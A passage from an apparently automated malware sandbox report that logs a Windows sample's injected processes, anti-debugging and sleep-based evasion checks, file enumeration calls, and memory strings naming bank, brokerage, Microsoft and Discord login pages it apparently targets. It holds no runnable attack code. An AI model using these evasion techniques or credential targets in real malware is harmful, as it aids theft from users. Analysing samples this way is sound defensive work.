            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ED85FE pushfd ; ret 7_2_02ED8618
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exeCode function: 7_2_02ECFD58 push esp; ret 7_2_02ECFDDA
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_04FF09AD push ecx; mov dword ptr [esp], ecx8_2_04FF09B6
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_03102255 push ebx; iretd 8_2_03102256
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031020D1 push ecx; iretd 8_2_031020DA
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031020FC push FFFFFF8Fh; iretd 8_2_03102108
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0310055A push edx; retf 8_2_031005EC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031005D5 push edx; retf 8_2_031005EC
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_031005E0 push edx; retf 8_2_031005EC
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeAPI/Special instruction interceptor: Address: 3F52784
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9830Jump to behavior
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\write.exe TID: 3132Thread sleep count: 142 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3132Thread sleep time: -284000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3132Thread sleep count: 9830 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3132Thread sleep time: -19660000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\vpeUaetvSDiFAFfLYWxeRxEUEIexZoYASUhraaZagIy\qvXzWppcWJ.exe TID: 5840Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 8_2_0310C340 FindFirstFileW,FindNextFileW,FindClose,8_2_0310C340
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 7251G3-6.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 7251G3-6.8.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 7251G3-6.8.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: qvXzWppcWJ.exe, 00000009.00000002.3361070852.00000000005CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
            Source: 7251G3-6.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 7251G3-6.8.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: write.exe, 00000008.00000002.3357490643.0000000003355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: 7251G3-6.8.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: firefox.exe, 0000000A.00000002.2853016772.00000268BC9AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7251G3-6.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 7251G3-6.8.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 7251G3-6.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 7251G3-6.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 7251G3-6.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 7251G3-6.8.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 7251G3-6.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 7251G3-6.8.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 7251G3-6.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 7251G3-6.8.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 7251G3-6.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 7251G3-6.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 7251G3-6.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeAPI call chain: ExitProcess graph end nodegraph_0-86846
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417593 LdrLoadDll,2_2_00417593
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_03F513A0 mov eax, dword ptr fs:[00000030h]0_2_03F513A0
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_03F52A50 mov eax, dword ptr fs:[00000030h]0_2_03F52A50
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_03F529F0 mov eax, dword ptr fs:[00000030h]0_2_03F529F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
